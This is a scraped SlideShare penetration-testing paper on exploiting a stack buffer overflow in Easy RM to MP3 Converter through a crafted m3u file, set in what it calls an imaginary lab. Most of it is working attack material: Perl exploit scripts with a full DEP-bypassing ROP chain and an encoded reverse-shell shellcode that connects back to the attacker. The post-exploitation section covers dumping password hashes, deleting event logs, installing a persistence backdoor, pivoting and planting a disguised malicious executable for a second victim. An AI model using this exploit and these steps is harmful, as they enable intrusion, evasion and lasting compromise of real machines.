SlideShare ist ein Scribd-Unternehmen logo

Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit

JongWon Kim
JongWon Kim

This is my first arti

1 von 21
Downloaden Sie, um offline zu lesen
Penetration Testing for Easy RM to MP3 Converter Application & Post Exploit Author: JongWon Kim dikien2012@gmail.com http://dikien2012.blogspot.com 1
Table of Contents Penetration Testing for Easy RM to MP3 Converter Application.............................................................1 Table of Contents……….........................................................................................................................2 Abstract..................................................................................................................................................3 Setting up the Testing Enviroment.........................................................................................................4 Strategy for the Application Testing........................................................................................................5 Dynamic Analysis...................................................................................................................................6 Strategy for the Post Exploit.................................................................................................................15 Post Exploit...........................................................................................................................................16 Conclusion............................................................................................................................................21 http://dikien2012.blogspot.com 2
Abstract Advanced Persistent Attack nowadays has threatened our valuable assets. Many exploits that threaten end point users and corporation have been researched day by day. No matter how operation system protection methods works well, privilege escalation could be easy just because a vulnerable application. Many corporations defends their information by setting firewall, WAF, and SLB, but only one vulnerable application could make these powerful protection line incapacitated. In this paper, I will analysis this application and suggest the solution within windows environment. This is imaginary scenario for this paper. My client requests me sometimes „Easy RM to MP3 Converter ‟exits when opening a m3u file that contains an overly long strings. First, I figure out this application has a vulnerability with stack based buffer overflow. I build the ROP based exploit to test. Second, I will attack the machine running the application with the exploitation and do post exploit. http://dikien2012.blogspot.com 3
Setting up the Testing Environment  Backtrack5 R1(Attack Machine, 192.168.10.10)  Windows SP2 (First Victim for the application penetration testing, 192.168.10.5, 10.10.10.5)  Windows SP3(Second Victim for pivot, 10.10.10.20)  Immunity Debugger 1.83  Easy RM to MP3 Converter(2.7.3.700, Vulnerable Application)  Metasploit Framework  Social Engineering Toolkit  ALFTP 5.22 Testing Environment Explanation : The default DEP, Data Execute Protection, setting for Windows SP2 is OptIn(All programs, process, services on the windows system are protected, except for processes in the exception list). Before taking a penetration testing, I manually have changed it to OptOut by adding „/noexecute=policy‟ to the end of the line that refers to the OS boot configuration. OptOut option is that all programs, processes, services on the Windows system are protected, except for processes in the exception list. There is no the exception list for this testing. http://dikien2012.blogspot.com 4
Strategy for the Application Testing I use one of the windows function calls named VirtualProtect() to bypass DEP. This function change the access protection level of a given memory page, allowing to make the location where my payload resides executable. I have to set up the stack with the correct parameters for that function first. I can‟t overwrite return address directly to my payload or use SEH chains because the payload will not get executed on stack since DEP is OptOut. Below is the prototype of VirtualProtect() : BOOL WINAPI VirtualProtect( __in LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flNewProtect, __out PDWORD lpflOldProtect );  Return address: VirtualProtect () will return to the pointer to the location where the address of the payload on the stack  lpAddress: A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.  dwSize: The size of the region whose access protection attributes are to be changed, in bytes.  flNewProtect: Option that specifies the new protection 0x00000040 PAGE_EXECUTE_READWRITE  lpflOldProtect : Pointer to variable that will receive the previous access protection value. http://dikien2012.blogspot.com 5
Dynamic Analysis At first, I calculate the offset between registers and the buffer with the perl script to make a vulnerable m3u file and run the application attached debugger with the m3u file. Below is source code to make an m3u file. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26058; $junk = $junk . "XXXX"; my $eip = "BBBB"; # This will overwrite the EIP. my $nops = "x90"x240; my $shellcode =””; my $rest = "C"x300; my $payload = $junk.$eip.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== [ Figure 1. EIP is overwritten with BBBB ] http://dikien2012.blogspot.com 6
42424242 is hexadecimal representation for BBBB. There is another method to find offset with mona.py by command line below debugger „!mona pattern_create 3000‟. I add this unique pattern to the script. ================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26000; my $pattern =””; # msf unique pattern is here my $nops = "x90"x240; my $shellcode = ""; my $rest = "C"x300; my $payload = $junk.$pattern.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== After crashing, I get more useful information by command „!mona suggest‟. On top of that, I check if the payload is corrupt or not by command „!mona compare -f “C:Documents and SettingsAdministrator바탕 화면RM2MP3Converterpattern.txt‟. I create gatgets to make a ROP chains by command „!mona rop -n -cm aslr=false,safeseh=false,rebase=false‟. After making the ROP chains, EIP will point the shellcode that I want to get executed. I made the shellcode with msfpayload and msfencode and added the script to make a final exploit m3u file. [ Figure 2. Making a Payload to connect back to attacker machine ] My final exploit is below. Stage-1 : Saving stack pointer to EAX and EDI registers and jumping over the parameters Stage-2 : Crafting parameters lead to setting up the arguments of a function that would allow me to disable DEP or bypass it. http://dikien2012.blogspot.com 7
================================================================== my $file= "exploit.m3u"; my $junk= "x41" x 26064; my $eip = pack('V',0x7C84483D); # RETN from kernel32.dll my $junk2 = "AAAA"; # Compensate for ########### Stage-1 Started here ########### ########### Put stack pointer in EDI & EAX ########### my $rop = pack('V',0x5a489ee7); # PUSH ESP//MOV EAX,EDX//POP EDI//RETN from uxtheme.dll $rop = $rop.pack('V',0x77bce842); # PUSH EDI//POP EAX//POP EBP//RETN from msvcrt.dll $rop = $rop."AAAA"; # Compensate for $rop = $rop.pack('V',0x1001653D); # ADD ESP,20//RETN from MSRMfilter03.dll ########### Parameters fpr VirtualProtect() ########### my $parameters =pack('V',0x7C801AD0); # Address for VirtualProtect () $parameters = $parameters."WWWW"; # Return address $parameters = $parameters."XXXX"; # lpaddress $parameters = $parameters."YYYY"; # Size $parameters = $parameters."ZZZZ"; # flNewProtect $parameters = $parameters.pack('V',0x10035005); # Writeable address $parameters = $parameters.("H" x 8); # Padding ########### Stage-1 finished ########### ########### Stage-2 starts is below ########### ########### First Parameter ############ my $rop2 = pack('V',0x77427175); # XCHG EDI,ESI//RETN 8 http://dikien2012.blogspot.com 8
########### Make EAX point at the shellcode ########### $rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP from MSRMfilter03.dll $rop2 = $rop2."AAAA"; # Padding - Compensate for RETN 8 $rop2 = $rop2."AAAA"; $rop2 = $rop2."AAAA"; ########### Second Parameter, RETN is in EAX ############ $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN $rop2 = $rop2."AAAA"; #Padding ########## EAX now contains Stack Pointer ############# $rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN ########## Make EAX point at Shellcode again ########### $rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; #Padding ########## Increase ESI with 4 ############# $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); ########## Write lpADDress ############ $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI $rop2 = $rop2."AAAA"; # Padding http://dikien2012.blogspot.com 9
########## Save EAX in ESI again ########## $rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX POP ESI RETN ########## Create Size Set EAX to 300 or so ########## $rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN $rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN $rop2 = $rop2."AAAA"; # Padding ########## Write Size, First Set ESI to Right Place ########## $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); $rop2 = $rop2.pack('V',0x5C83F948); ########## 3th Parameter ########## $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI $rop2 = $rop2."AAAA"; # Padding ########## Save EAX in ESI again ########## $rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN ########## flNewProject 0x40 ########## $rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN $rop2 = $rop2.pack('V',0x1002DC41); # ADD EAX,40//POP EBP//RETN http://dikien2012.blogspot.com 10
$rop2 = $rop2."AAAA"; # Padding $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 $rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32 ########## 4th Parameter ########## $rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//RETN $rop2 = $rop2."AAAA"; # Padding ########## Return to virtual protect pointer, Compensate for 2 POPs instruction ########## $rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret $rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret ########## Change ESP & Back to the origin ########## $rop2 = $rop2.pack('V',0x73D35CA8); # PUSH EAX//POP ESP//MOV EAX,EDI//POP EDI//POP ESI//RETN from MFC32.dll my $nops = "x90"x240; $shellcode = "x89xe0xd9xf6xd9x70xf4x5ax4ax4ax4ax4ax4ax4a" . "x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" . "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" . "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" . "x75x4ax49x49x6cx49x78x6bx39x43x30x75x50x53" . "x30x73x50x4ex69x4dx35x44x71x6ex32x62x44x6c" . "x4bx62x72x30x30x4cx4bx46x32x56x6cx6ex6bx30" . "x52x75x44x6ex6bx61x62x56x48x74x4fx4dx67x42" . "x6ax65x76x30x31x49x6fx66x51x79x50x6cx6cx75" . http://dikien2012.blogspot.com 11
"x6cx45x31x53x4cx35x52x56x4cx71x30x59x51x48" . "x4fx54x4dx37x71x7ax67x6dx32x5ax50x76x32x66" . "x37x4ex6bx56x32x44x50x6ex6bx37x32x37x4cx55" . "x51x5ax70x4cx4bx63x70x30x78x6fx75x39x50x32" . "x54x62x6ax47x71x48x50x30x50x6ex6bx73x78x55" . "x48x4ex6bx46x38x57x50x55x51x6ex33x59x73x47" . "x4cx42x69x4ex6bx75x64x4cx4bx33x31x4bx66x55" . "x61x4bx4fx55x61x79x50x4ex4cx59x51x7ax6fx54" . "x4dx55x51x6ax67x66x58x49x70x30x75x58x74x65" . "x53x31x6dx5ax58x37x4bx63x4dx46x44x73x45x39" . "x72x31x48x4ex6bx76x38x77x54x65x51x59x43x42" . "x46x4ex6bx56x6cx50x4bx4ex6bx31x48x45x4cx43" . "x31x79x43x6cx4bx45x54x4ex6bx77x71x4ex30x4c" . "x49x43x74x54x64x65x74x61x4bx71x4bx73x51x70" . "x59x52x7ax66x31x69x6fx49x70x62x78x33x6fx61" . "x4ax6cx4bx45x42x4ax4bx4bx36x61x4dx71x78x76" . "x53x54x72x45x50x57x70x75x38x52x57x33x43x66" . "x52x73x6fx63x64x42x48x30x4cx52x57x66x46x57" . "x77x4bx4fx78x55x4cx78x4ex70x65x51x75x50x67" . "x70x71x39x38x44x71x44x70x50x70x68x51x39x6b" . "x30x50x6bx77x70x59x6fx38x55x42x70x52x70x46" . "x30x62x70x67x30x66x30x61x50x70x50x42x48x7a" . "x4ax44x4fx79x4fx39x70x4bx4fx58x55x4ax37x43" . "x5ax67x75x65x38x69x50x4dx78x35x5ax37x7ax35" . "x38x35x52x33x30x56x71x51x4cx4dx59x38x66x51" . "x7ax54x50x62x76x66x37x35x38x4ex79x49x35x74" . "x34x71x71x69x6fx6ax75x4fx75x6bx70x42x54x56" . "x6cx49x6fx62x6ex74x48x63x45x7ax4cx32x48x6c" . "x30x6fx45x4ex42x63x66x49x6fx68x55x61x7ax47" . http://dikien2012.blogspot.com 12
"x70x61x7ax34x44x50x56x36x37x75x38x63x32x4b" . "x69x69x58x73x6fx49x6fx39x45x4ex6bx57x46x31" . "x7ax47x30x33x58x55x50x44x50x47x70x73x30x32" . "x76x62x4ax65x50x32x48x66x38x69x34x61x43x59" . "x75x69x6fx68x55x5ax33x56x33x61x7ax55x50x61" . "x46x32x73x50x57x30x68x66x62x68x59x48x48x53" . "x6fx6bx4fx39x45x47x71x48x43x57x59x58x46x4e" . "x65x4cx36x30x75x68x6cx6fx33x41x41"; my $rest = "C"x300; my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcod size : ".length($shellcde)."n"; open($FILE,">$file"); print $FILE "$payload"; close($FILE); print "m3u File Created successfullyn"; ================================================================== Since the shellcode is turning back to the backtrack machine, I use multi handler on msfconosole to listen on 4444 tcp port. [ Figure 3. Listening on 4444 tcp port ] http://dikien2012.blogspot.com 13
I create the m3u file with above script and open it with the application. [ Figure 4. Open the exploit.m3u to crach the application ] I get the meterpreter shell from first victim machine.. [ Figure 5. Get the Meterpreter shell from the first Victim Machine ] http://dikien2012.blogspot.com 14
Strategy for the Post Exploit 1. Understanding the Victim better 2. Privilege Escalation 3. Deleting Logs and Killing Monitoring software 4. Collecting Data, and Executing programs 5. Backdoors and Rootkits 6. Using victims as a Pivot to hack deeper into the network http://dikien2012.blogspot.com 15
Post Exploit 1. Understaning the Victim better [ Figure 5. Network Information ] I figure out password hashes and can crack it with JohnTheRipper. If I cannot figure out what the original passwords, I can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. [ Figure 6. Password Hashes ] I can look for more vulnerable applications, available tokens, and routing table. [ Figure 7. Token Lists ] http://dikien2012.blogspot.com 16
[ Figure 8. Running applications ] [ Figure 9. Routing Table ] I notice this machine is running on ALFTP, it will be used on social engineering attack. [ Figure 10. ALFTP is running ] 2. Privilege Escalation After getting the system, I safely migrate 1072(svchost.exe) via technique 1. [ Figure 11. Privilege Escalation Success ] http://dikien2012.blogspot.com 17
3. Deleting Logs and Killing Monitoring software I try to kill anti virus software, but there is no it and get rid of event logs. [ Figure 12. Killing AV and deleting event logs ] 4. Collecting Data, and Executing programs [ Figure 13. Collecting txt files ] 5. Backdoors and Rootkits I run persistence and tell Windows to auto start the agent at boot time, wait 100 seconds before connection retries to run on port 443 and connect to IP 192.168.10.5. [ Figure 14. Installing the Backdoor ] http://dikien2012.blogspot.com 18
6. Using victims as a Pivot to hack deeper into the network I found the first victim machine has two network cards of different subnets, which will be inner network disconnected from outside. I go inside using first victim machine working tunnel. [ Figure 15. Setting routing table ] [ Figure 16. Running scan via session 1 ] I am aware the second victim machine (10.10.10.20) has open port for 139, which means it could have vulnerability for „MS08-067‟. [ Figure 17. Port Scan ] I make a malicious file with fake name (alsong.exe) that works for connecting back to attacker machine with meterpreter shell. I find the working directory for FTP Server on first victim machine and upload it. [ Figure 18. Uploading the malicious file ] http://dikien2012.blogspot.com 19
Check it out malicious file is on the FTP Server. Second victim download and execute it. [ Figure 19. Uploading the malicious file ] New session is created by second victim machine. [ Figure 20. Attak Success on second Victim machine ] http://dikien2012.blogspot.com 20
Conclusion I showed vulnerable application could threaten the inner intranet. It is not always latest OS protection mechanism, Firewall, and SLB can protect our assets. It is vital that not only developers should ensure their secure coding from preventing from such as buffer over flow or heap spray attack, but also end point users should be aware security consciousness whose they don‟t have to use applications they don‟t use for work and always updated to the latest condition. It is obvious that essential database should be away from normal staffs completely. As is frequently pointed out, we should keep in mind attack could happen inside. http://dikien2012.blogspot.com 21

Empfohlen

Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful developmentConnor McDonald
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTDevil's Cafe
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Examples from Pune meetup
Examples from Pune meetupExamples from Pune meetup
Examples from Pune meetupSantosh Ojha
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014Martin Hron
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
APEX tour 2019 - successful development with autonomous
APEX tour 2019 - successful development with autonomousAPEX tour 2019 - successful development with autonomous
APEX tour 2019 - successful development with autonomousConnor McDonald
 
penetration testing - black box type.
penetration testing - black box type.penetration testing - black box type.
penetration testing - black box type.luigi capuzzello
 

Empfohlen

Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful developmentConnor McDonald
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTDevil's Cafe
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Examples from Pune meetup
Examples from Pune meetupExamples from Pune meetup
Examples from Pune meetupSantosh Ojha
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014Martin Hron
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
APEX tour 2019 - successful development with autonomous
APEX tour 2019 - successful development with autonomousAPEX tour 2019 - successful development with autonomous
APEX tour 2019 - successful development with autonomousConnor McDonald
 
penetration testing - black box type.
penetration testing - black box type.penetration testing - black box type.
penetration testing - black box type.luigi capuzzello
 
Developing Drizzle Replication Plugins
Developing Drizzle Replication PluginsDeveloping Drizzle Replication Plugins
Developing Drizzle Replication PluginsPadraig O'Sullivan
 
From A to Z | WireShark Tutorial
From A to Z | WireShark TutorialFrom A to Z | WireShark Tutorial
From A to Z | WireShark TutorialTurkHackTeam EDU
 
Hardening Drupal setup
Hardening Drupal setupHardening Drupal setup
Hardening Drupal setupZeeland Family
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsEran Goldstein
 
EPHPC Webinar Slides: Unit Testing by Arthur Purnama
EPHPC Webinar Slides: Unit Testing by Arthur PurnamaEPHPC Webinar Slides: Unit Testing by Arthur Purnama
EPHPC Webinar Slides: Unit Testing by Arthur PurnamaEnterprise PHP Center
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Mocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitMocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitmfrost503
 
How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)Gavin Guo
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Flask SQLAlchemy
Flask SQLAlchemy Flask SQLAlchemy
Flask SQLAlchemy Eueung Mulyana
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
Shytikov on NTLM Authentication
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authenticationshytikov
 
Getting started with replica set in MongoDB
Getting started with replica set in MongoDBGetting started with replica set in MongoDB
Getting started with replica set in MongoDBKishor Parkhe
 
Cutting out Malware
Cutting out MalwareCutting out Malware
Cutting out Malwareluigi capuzzello
 
SecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPSecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPChris John Riley
 
Flask RESTful Flask HTTPAuth
Flask RESTful Flask HTTPAuthFlask RESTful Flask HTTPAuth
Flask RESTful Flask HTTPAuthEueung Mulyana
 
Why is the application running so slowly?
Why is the application running so slowly?Why is the application running so slowly?
Why is the application running so slowly?Michael Rosenblum
 
Optimizer Cost Model MySQL 5.7
Optimizer Cost Model MySQL 5.7Optimizer Cost Model MySQL 5.7
Optimizer Cost Model MySQL 5.7I Goo Lee
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 
Sicurezza informatica
Sicurezza informaticaSicurezza informatica
Sicurezza informaticaluigi capuzzello
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Burn down the silos! Helping dev and ops gel on high availability websites
Burn down the silos! Helping dev and ops gel on high availability websitesBurn down the silos! Helping dev and ops gel on high availability websites
Burn down the silos! Helping dev and ops gel on high availability websitesLindsay Holmwood
 

Weitere ähnliche Inhalte

Was ist angesagt?

Developing Drizzle Replication Plugins
Developing Drizzle Replication PluginsDeveloping Drizzle Replication Plugins
Developing Drizzle Replication PluginsPadraig O'Sullivan
 
From A to Z | WireShark Tutorial
From A to Z | WireShark TutorialFrom A to Z | WireShark Tutorial
From A to Z | WireShark TutorialTurkHackTeam EDU
 
Hardening Drupal setup
Hardening Drupal setupHardening Drupal setup
Hardening Drupal setupZeeland Family
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsEran Goldstein
 
EPHPC Webinar Slides: Unit Testing by Arthur Purnama
EPHPC Webinar Slides: Unit Testing by Arthur PurnamaEPHPC Webinar Slides: Unit Testing by Arthur Purnama
EPHPC Webinar Slides: Unit Testing by Arthur PurnamaEnterprise PHP Center
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Mocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitMocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitmfrost503
 
How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)Gavin Guo
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
Shytikov on NTLM Authentication
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authenticationshytikov
 
Getting started with replica set in MongoDB
Getting started with replica set in MongoDBGetting started with replica set in MongoDB
Getting started with replica set in MongoDBKishor Parkhe
 
SecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPSecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPChris John Riley
 
Flask RESTful Flask HTTPAuth
Flask RESTful Flask HTTPAuthFlask RESTful Flask HTTPAuth
Flask RESTful Flask HTTPAuthEueung Mulyana
 
Why is the application running so slowly?
Why is the application running so slowly?Why is the application running so slowly?
Why is the application running so slowly?Michael Rosenblum
 
Optimizer Cost Model MySQL 5.7
Optimizer Cost Model MySQL 5.7Optimizer Cost Model MySQL 5.7
Optimizer Cost Model MySQL 5.7I Goo Lee
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 

Was ist angesagt? (20)

Developing Drizzle Replication Plugins
Developing Drizzle Replication PluginsDeveloping Drizzle Replication Plugins
Developing Drizzle Replication Plugins
 
From A to Z | WireShark Tutorial
From A to Z | WireShark TutorialFrom A to Z | WireShark Tutorial
From A to Z | WireShark Tutorial
 
Hardening Drupal setup
Hardening Drupal setupHardening Drupal setup
Hardening Drupal setup
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentals
 
EPHPC Webinar Slides: Unit Testing by Arthur Purnama
EPHPC Webinar Slides: Unit Testing by Arthur PurnamaEPHPC Webinar Slides: Unit Testing by Arthur Purnama
EPHPC Webinar Slides: Unit Testing by Arthur Purnama
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Mocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitMocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnit
 
How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
 
Flask SQLAlchemy
Flask SQLAlchemy Flask SQLAlchemy
Flask SQLAlchemy
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]
 
Shytikov on NTLM Authentication
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authentication
 
Getting started with replica set in MongoDB
Getting started with replica set in MongoDBGetting started with replica set in MongoDB
Getting started with replica set in MongoDB
 
Cutting out Malware
Cutting out MalwareCutting out Malware
Cutting out Malware
 
SecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPSecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAP
 
Flask RESTful Flask HTTPAuth
Flask RESTful Flask HTTPAuthFlask RESTful Flask HTTPAuth
Flask RESTful Flask HTTPAuth
 
Why is the application running so slowly?
Why is the application running so slowly?Why is the application running so slowly?
Why is the application running so slowly?
 
Optimizer Cost Model MySQL 5.7
Optimizer Cost Model MySQL 5.7Optimizer Cost Model MySQL 5.7
Optimizer Cost Model MySQL 5.7
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
Sicurezza informatica
Sicurezza informaticaSicurezza informatica
Sicurezza informatica
 

Ähnlich wie Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit

Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Burn down the silos! Helping dev and ops gel on high availability websites
Burn down the silos! Helping dev and ops gel on high availability websitesBurn down the silos! Helping dev and ops gel on high availability websites
Burn down the silos! Helping dev and ops gel on high availability websitesLindsay Holmwood
 
Buffer overflow tutorial
Buffer overflow tutorialBuffer overflow tutorial
Buffer overflow tutorialhughpearse
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetAchieve Internet
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindSam Keen
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
Node.js basics
Node.js basicsNode.js basics
Node.js basicsBen Lin
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming Max Kleiner
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonPuppet
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Browser exploitation SEC-T 2019 stockholm
Browser exploitation SEC-T 2019 stockholmBrowser exploitation SEC-T 2019 stockholm
